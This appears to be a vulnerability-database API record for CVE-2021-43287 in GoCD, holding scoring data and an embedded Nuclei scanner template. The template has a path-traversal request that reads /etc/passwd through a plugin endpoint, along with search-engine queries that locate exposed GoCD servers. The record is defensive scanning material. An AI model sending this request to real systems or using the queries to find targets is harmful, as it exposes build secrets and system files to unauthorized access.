{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-43287/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-43287/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-43287/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-43287/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-43287/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-43287"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-43287"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.28039,
      "kev": false,
      "percentile": 0.98022
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2021/CVE-2021-43287.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2021-43287\n\ninfo:\n  name: Pre-Auth Takeover of Build Pipelines in GoCD\n  author: dhiyaneshDk\n  severity: high\n  description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access and control over the build pipelines, potentially resulting in the execution of arbitrary code or unauthorized modifications.\n  remediation: Upgrade to version v21.3.0. or later.\n  reference:\n    - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50\n    - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover\n    - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140\n    - https://www.gocd.org/releases/#21-3-0\n    - https://github.com/gocd/gocd/commit/41abc210ac4e8cfa184483c9ff1c0cc04fb3511c\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-43287\n    cwe-id: CWE-200\n    epss-score: 0.28039\n    epss-percentile: 0.98022\n    cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: thoughtworks\n    product: gocd\n    shodan-query:\n      - http.title:\"Create a pipeline - Go\" html:\"GoCD Version\"\n      - http.html:\"gocd version\"\n      - http.title:\"create a pipeline - go\" html:\"gocd version\"\n    fofa-query:\n      - title=\"create a pipeline - go\" html:\"gocd version\"\n      - body=\"gocd version\"\n    google-query: intitle:\"create a pipeline - go\" html:\"gocd version\"\n  tags: cve2021,cve,go,lfi,gocd,thoughtworks,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100eee8e0137187deba226d64edc8a3a51dbbfe4e6bfe6d4ba352a4b273543a3c4a022100cab97fdcaeffa6e44850fa386fcd7540942ab863469bf7fc6c84214d32de774a:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2021-43287"
}